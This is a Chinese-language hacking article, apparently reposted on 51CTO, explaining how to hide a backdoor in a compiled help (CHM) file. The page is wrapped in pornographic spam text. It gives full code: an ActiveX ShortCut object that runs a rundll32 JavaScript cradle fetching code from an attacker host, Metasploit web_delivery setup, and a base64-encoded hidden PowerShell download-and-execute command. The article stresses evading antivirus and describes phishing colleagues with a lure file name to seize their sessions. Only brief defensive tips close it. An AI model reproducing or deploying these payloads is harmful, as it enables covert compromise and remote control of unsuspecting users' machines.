成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

高級組合技打造“完美” 捆綁后門

安全 黑客攻防
在使用各個Client進行測試的過程中,個人發現CHM文件是最好用的一個,但是其缺點就是會彈黑框,這樣就會讓被攻擊者察覺。那么怎么讓他不彈黑框呢?那就是本文要介紹的內容啦~

0x00 簡介

之前寫過一篇關于客戶端釣魚的文章:《使用powershell Client進行有效釣魚》中,在使用各個Client進行測試的過程中,個人發現CHM文件是最好用的一個,但是其缺點就是會彈黑框,這樣就會讓被攻擊者察覺。那么怎么讓他不彈黑框呢?那就是本文要介紹的內容啦~

[[164849]]

0x01 CHM 簡介

在介紹怎么使用CHM來作為后門之前,首先要知道CMH是什么東西。

CHM(Compiled Help Manual)即“已編譯的幫助文件”。它是微軟新一代的幫助文件格式,利用HTML作源文,把幫助內容以類似數據庫的形式編譯儲存。CHM支持Javas cript、VBs cript、ActiveX、Java Applet、Flash、常見圖形文件(GIF、JPEG、PNG)、音頻視頻文件(MID、WAV、AVI)等等,并可以通過URL與Internet聯系在一起。因為使用方便,形式多樣也被采用作為電子書的格式。

0x02 CHM 制作

CHM的制作方法很多。有多款工具可以使用,這里就不在做詳細的介紹了。本次測試使用了EasyCHM來制作CHM文件,使用起來非常簡單。

新建如下目錄,文件內容隨意:

 高級組合技打造“完美” 捆綁后門

 

打開EasyCHM,新建->瀏覽。選擇該目錄。默認文件類型:

高級組合技打造“完美” 捆綁后門 

 

點擊確認,即可看到預覽的CHM文件:

高級組合技打造“完美” 捆綁后門 

 

選擇編譯,即可編譯成CHM文件。

0x03 CHM Execute Command

14年的時候@ithurricanept 在twitter上發了一個demo,通過CHM運行計算器:

高級組合技打造“完美” 捆綁后門 

 

利用代碼如下:

  1. <!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body> 
  2. command exec   
  3. <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> 
  4. <PARAM name="Command" value="ShortCut"> 
  5.  <PARAM name="Button" value="Bitmap::shortcut"> 
  6.  <PARAM name="Item1" value=',calc.exe'> 
  7.  <PARAM name="Item2" value="273,1,1"> 
  8. </OBJECT> 
  9. <SCRIPT> 
  10. x.Click();  
  11. </SCRIPT> 
  12. </body></html> 

將以上代碼寫入html,置于工程目錄進行編譯,生成CHM文件,運行此文件,彈出計算器:

高級組合技打造“完美” 捆綁后門

 0x04 去除彈框

有測試過nishang Out-CHM 的同學會發現,運行生成的CHM文件的時候會看到明顯的彈框。就像這樣:

高級組合技打造“完美” 捆綁后門

 

某個晚上突然腦洞了一下,想到了一個好的方式來讓他不顯示彈框,即結合使用JavaScript Backdoor。經過測試,成功實現在不彈框的情況下獲取meterpreter會話,此次測試使用一個我修改過的python版 JSRat.ps1 ,地址為:MyJSRat。使用方式詳見 readme。

以下為完整的測試過程:

1、結合CHM + JSBackdoor

使用交互模式的JSRat server:

  1. python MyJSRat.py -i 192.168.1.101 -p 8080 

python MyJSRat.py -i 192.168.1.101 -p 8080

高級組合技打造“完美” 捆綁后門

 

訪問 http://192.168.1.101:8080/wtf 獲取攻擊代碼如下:

  1. rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} 

經過多次測試,成功將以上命令寫入chm,其Html代碼為:

  1. <!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body> 
  2. This is a demo ! <br> 
  3. <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> 
  4. <PARAM name="Command" value="ShortCut"> 
  5.  <PARAM name="Button" value="Bitmap::shortcut"> 
  6.  <PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'> 
  7.  <PARAM name="Item2" value="273,1,1"> 
  8. </OBJECT> 
  9. <SCRIPT> 
  10. x.Click();  
  11. </SCRIPT> 
  12. </body></html> 

編譯以后運行,可以成功獲取JS交互shell:

高級組合技打造“完美” 捆綁后門

 

直接執行cmd /c command 是會有黑框的,可以使用run來避免顯示黑框。執行run以后,輸入 whoami > e:\1.txt 之后通過read 來獲取回顯。

2、獲取meterpreter會話

此次測試獲取meterpreter會話的方式是通過執行powershell命令,直接獲取,當獲取客戶端JS 交互shell之后自動執行powershell命令,獲取meterpreter會話。具體操作如下:

開啟MSF web_delivery:

  1. ~  msfconsole -Lq  
  2. msf > use exploit/multi/script/web_delivery  
  3. msf exploit(web_delivery) > set target 2  
  4. target => 2  
  5. msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp  
  6. payload => windows/meterpreter/reverse_tcp  
  7. msf exploit(web_delivery) > set lhost 192.168.1.101  
  8. lhost => 192.168.1.101  
  9. msf exploit(web_delivery) > set lport 6666  
  10. lport => 6666  
  11. msf exploit(web_delivery) > set SRVPORT 8081  
  12. SRVPORT => 8081  
  13. msf exploit(web_delivery) > set uripath /  
  14. uripath => /  
  15. msf exploit(web_delivery) > exploit  
  16. [*] Exploit running as background job.  
  17. msf exploit(web_delivery) > 
  18. [*] Started reverse TCP handler on 192.168.1.101:6666  
  19. [*] Using URL: http://0.0.0.0:8081/  
  20. [*] Local IP: http://192.168.1.101:8081/  
  21. [*] Server started.  
  22. [*] Run the following command on the target machine:  
  23. powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/'); 

裝有powershell的客戶端執行以下命令則可獲取meterpreter會話:

  1. powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/'); 

由于存在特殊字符,我們可以把以上代碼編碼為base64格式,將以下代碼存入power.txt

  1. $n=new-object net.webclient;  
  2. $n.proxy=[Net.WebRequest]::GetSystemWebProxy();  
  3. $n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;  
  4. IEX $n.downloadstring('http://192.168.1.101:8081/'); 

執行以下命令:

  1. cat power.txt | iconv --to-code UTF-16LE |base64 

高級組合技打造“完美” 捆綁后門

 

最終要執行的powershell命令為:

  1. powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA== 

使用執行命令模式直接獲取meterpreter會話:

  1. python MyJSRat.py -i 192.168.1.101 -p 8080 -c "powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA==" 

測試過程中,從運行CHM到獲取meterpreter,客戶端無明顯異常,全程無黑框彈出,獲取到meterpreter會話如下圖:

高級組合技打造“完美” 捆綁后門

 

3、是否被殺?

可能很多人會問,會不會被殺,下面是virscan的查殺結果:

http://r.virscan.org/report/6173ee9c62d29806bb84035a8f1738ba

高級組合技打造“完美” 捆綁后門

 

0x05 利用場景

一張圖說明(讓我猜猜你會不會點):

 

注: 隨便找了幾個漏洞利用工具修改了文件名,并不代表原作者分享的工具有問題。

0x06 實際測試

是用上述方式制作chm文件,命名為一個比較有吸引力的名字,比如在公司技術群發了一個名字為"制作免殺后門.chm"的文件,實際測試結果如下圖:

高級組合技打造“完美” 捆綁后門

 

成功獲取多個人的meterpreter會話。

0x07 防御

目前我還沒查到什么防御的姿勢,知道的小伙伴可以分享一下。最好就是提高個人安全意識,對于這類文件,多注意一下,盡量別亂點,如果非要點,可以放到虛擬機里面。使用procexp.exe可以看到存在后門的chm文件會開啟新的進程:

高級組合技打造“完美” 捆綁后門

 

對于碰到這種后門,怎么溯源呢,其實也很簡單,chm是可以反編譯為html的。 使用windows自帶的hh.exe 則可進行反編譯。命令如下:

C:\Users\evi1cg\Desktop>hh -decompile test poc.chm #test 為當前目錄的test文件夾

執行結果如下:

高級組合技打造“完美” 捆綁后門

 

0x08 小結

此次測試就是對一些已知的攻擊手法進行結合,結果是讓此捆綁后門更加隱蔽,近乎“完美”,美中不足的是在文件開啟的時候會出現短暫的卡頓。有時候小漏洞結合起來能造成大危害,小手法結合起來也能成大殺器。本著分享的精神將此姿勢介紹,希望小伙伴們能免受其害。

0x09 參考

https://twitter.com/ithurricanept/status/534993743196090368

https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1

http://drops.wooyun.org/tips/11764

https://github.com/samratashok/nishang

責任編輯:藍雨淚 來源: 烏云知識庫
相關推薦

2018-11-07 09:35:50

2018-11-20 10:09:28

網絡安全網絡安全技術周刊

2014-06-19 15:44:31

2010-09-25 08:44:34

捆綁后門

2009-08-27 17:57:54

2010-09-17 16:23:53

分離捆綁后門

2009-10-10 16:18:08

RHEL 5搭建FTP

2018-04-27 14:08:40

云容器DevOps

2009-10-12 11:11:17

RHEL 5 Xen

2012-08-31 14:48:23

2009-07-02 09:19:13

Java+FlexRIA應用

2010-05-31 12:27:54

版本控制工具SVN

2011-01-19 10:03:24

Ubuntu

2014-04-02 10:20:20

銳捷網絡云課堂

2009-10-20 10:57:26

企業網絡綜合布線

2024-04-16 16:22:19

數據中心區域供熱系統服務器

2021-05-26 10:36:22

戴爾

2023-07-04 08:38:22

AIDevOps軟件

2022-03-14 14:01:05

區塊鏈人工智能技術

2010-09-13 14:47:58

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 精品三级在线观看 | 成人三级视频 | 一级毛片视频 | 噜啊噜在线 | 亚洲欧美日韩精品久久亚洲区 | 精品一区二区免费视频 | 欧美日韩在线成人 | 全免费a级毛片免费看视频免费下 | 黑人性hd| 成人午夜视频在线观看 | 超碰97在线免费 | 成人免费观看男女羞羞视频 | 人人九九 | 粉色午夜视频 | 毛片在线看片 | 国产精品九九九 | 香蕉91 | 99热播放| 欧美一区二区三区久久精品 | 少妇诱惑av | 国产精品久久久久久久久久久久 | 亚洲一区二区三区免费观看 | 精品一二区 | 国产一级淫片免费视频 | 久久免费高清视频 | 久艹av | 国产精品久久久久久久久久免费看 | 国产99久久| 欧美成人免费在线视频 | 国产毛片久久久久久久久春天 | 91一区二区| 久久精品91| 国产伊人久久久 | 成人免费视频在线观看 | 第一色在线 | 免费三级黄 | 国产精品久久久久久久久久久新郎 | 在线高清免费观看视频 | 99精品视频免费观看 | 亚洲热在线视频 | 日本中文字幕日韩精品免费 |